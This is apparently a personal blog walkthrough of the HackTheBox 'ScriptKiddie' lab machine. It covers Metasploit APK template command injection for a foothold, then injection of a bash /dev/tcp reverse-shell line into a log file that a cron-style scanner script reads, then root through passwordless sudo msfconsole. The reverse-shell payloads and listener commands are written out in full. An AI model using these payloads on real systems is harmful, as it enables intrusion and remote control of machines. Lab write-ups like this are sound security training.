Posts HackTheBox - ScriptKiddie
Post
Cancel

HackTheBox - ScriptKiddie

This box was the first live box i’ve managed to root. Utilising metasploit to gain a foothold, and then writing a bash reverse shell into a file to elevate privileges, gaining root

Key takeways:

  • Template command injection using metasploit
  • Identifying and understanding vulnerabilities in bash scripts
  • Writing a reverse shell bash script into target file

Machine IP = 10.10.10.226

Enumeration

First things first, start out with an nmap scan of the host.

nmap -sV -sC -T 5 10.10.10.226

─$ nmap -sV -sC -T 5 10.10.10.226                                                                          130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-28 08:59 EDT
Nmap scan report for 10.10.10.226
Host is up (0.031s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.84 seconds

As we can see, we have SSH on port 22, and a web server titled “k1d’5 h4ck3r t00l5”. Lets take a look:

Website

Website

Initial thoughts are pointing me towards the file upload button, maybe we can upload a reverse shell?


Foothold

After playing around with the site, and googling Linux template file upload vulnerabilities, i came accross a metasploit module on rapid7:

Rapid 7 - msfvenom apk cmd injection

It outlines the steps as follows:

msf > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > show targets
    ...targets...
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > set TARGET < target-id >
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > show options
    ...show and set options...
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > exploit

Where

  • RHOSTS = 10.10.10.226
  • RPORT = 5000
  • LHOST = 10.10.14.15
  • RPORT = 5555

Running this module produced an APK with a reverse shell called msf.apk. As APK’s are used for applications on android devices, we can attempt via the android OS option. Lets try and upload this to the webserver and connect back to our machine.

Getting a shell

First, lets start our netcat listener on our host machine:

nc -nvlp 5555

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -nvlp 5555                 
listening on [any] 5555 ...

and then upload the APK to the target machine via the website, with the OS set to android, and then press generate.

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -nvlp 5555                                                                                             
listening on [any] 5555 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.226] 50388
whoami
kid

Boom! we have a reverse shell! now lets elevate it to an interactive shell using

python3 -c 'import pty; pty.spawn("/bin/bash")'

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -nvlp 5555                                                                                             1 ⨯
listening on [any] 5555 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.226] 50392
whoami
kid
python3 -c 'import pty; pty.spawn("/bin/bash")'
kid@scriptkiddie:~/html$ 

User.txt

Some quick searching lead to the first flag:

kid@scriptkiddie:~$ more user.txt
more user.txt
***d05c9b66325f22*a4c59c75c*7a03

Priveledge Esculation

Looking around, it seems there is another user: pwn In the directory is a file called scanlosers.sh. Lets take a look:

kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
cat scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

It looks as though the script is always being run, taking an ip from hackers and then running it, deleting the contents of hackers when it is finished. Maybe we can write a shell to the file?

After lots of trial and syntax errors, i finally got a shell using the following:

echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.15/1234 0>&1' #" > hackers

Using the ; to escape from recon/ and # to comment out everything after our script.

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -nvlp 1234                                                                                             
listening on [any] 1234 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.226] 33360
bash: cannot set terminal process group (870): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ whoami
whoami
pwn

Great! Lets see what commands can be run by pwn

sudo -l

pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

Looks as though we can run metasploit as root on pwn with no password needed!

msf6 > whoami
[*] exec: whoami

root

Root.txt

msf6 > cat root.txt
[*] exec: cat root.txt

***31120548006c2e8fc52d912365797
This post is licensed under CC BY 4.0 by the author.